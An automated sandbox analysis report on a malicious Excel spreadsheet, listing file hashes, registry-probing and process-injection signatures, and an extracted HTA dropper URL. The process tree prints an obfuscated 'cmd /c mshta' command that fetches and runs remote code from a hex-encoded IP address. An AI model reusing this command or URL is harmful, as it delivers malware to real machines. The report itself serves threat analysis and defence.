Analysis
-
max time kernel
130s -
max time network
133s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
19-01-2022 18:40
Behavioral task
behavioral1
Sample
c425b918e6144021b603d7713891f953c90f3fe0b724c2fd15767e577edb7ba0.xls
Resource
win10-en-20211208
windows10_x64
0 signatures
0 seconds
General
-
Target
c425b918e6144021b603d7713891f953c90f3fe0b724c2fd15767e577edb7ba0.xls
-
Size
142KB
-
MD5
b25483c9c42f369b467a92aba6a54846
-
SHA1
9a80eefb86b8fcb134c3377ead5cd7dccc76c4f8
-
SHA256
c425b918e6144021b603d7713891f953c90f3fe0b724c2fd15767e577edb7ba0
-
SHA512
1be9aeaa5b4b8d11da2ecc5903145294f9ae6e84d2b0045c2f3371ab0a960561095711b8a9338f9f2b0502caf3bc36cbdcbf8135130d768c295a4cd72968711c
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
http://0xb907d607/fer/fer.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2812 2664 cmd.exe 67 -
Blocklisted process makes network request 1 IoCs
flow pid Process 45 2588 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2664 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 2664 EXCEL.EXE 2664 EXCEL.EXE 2664 EXCEL.EXE 2664 EXCEL.EXE 2664 EXCEL.EXE 2664 EXCEL.EXE 2664 EXCEL.EXE 2664 EXCEL.EXE 2664 EXCEL.EXE 2664 EXCEL.EXE 2664 EXCEL.EXE 2664 EXCEL.EXE 2664 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2664 wrote to memory of 2040 2664 EXCEL.EXE 69 PID 2664 wrote to memory of 2040 2664 EXCEL.EXE 69 PID 2664 wrote to memory of 2812 2664 EXCEL.EXE 71 PID 2664 wrote to memory of 2812 2664 EXCEL.EXE 71 PID 2812 wrote to memory of 2588 2812 cmd.exe 73 PID 2812 wrote to memory of 2588 2812 cmd.exe 73
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c425b918e6144021b603d7713891f953c90f3fe0b724c2fd15767e577edb7ba0.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2040
-
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fer.html3⤵
- Blocklisted process makes network request
PID:2588
-
-